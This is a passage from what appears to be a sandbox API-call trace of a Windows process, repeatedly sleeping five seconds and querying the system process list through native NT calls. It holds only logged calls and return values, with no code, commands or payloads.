NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.515] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.522] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.529] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.536] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.547] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.554] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.563] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.569] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.577] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.583] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.606] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.613] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.621] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.628] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.636] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.643] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.652] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.661] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.672] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.681] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, 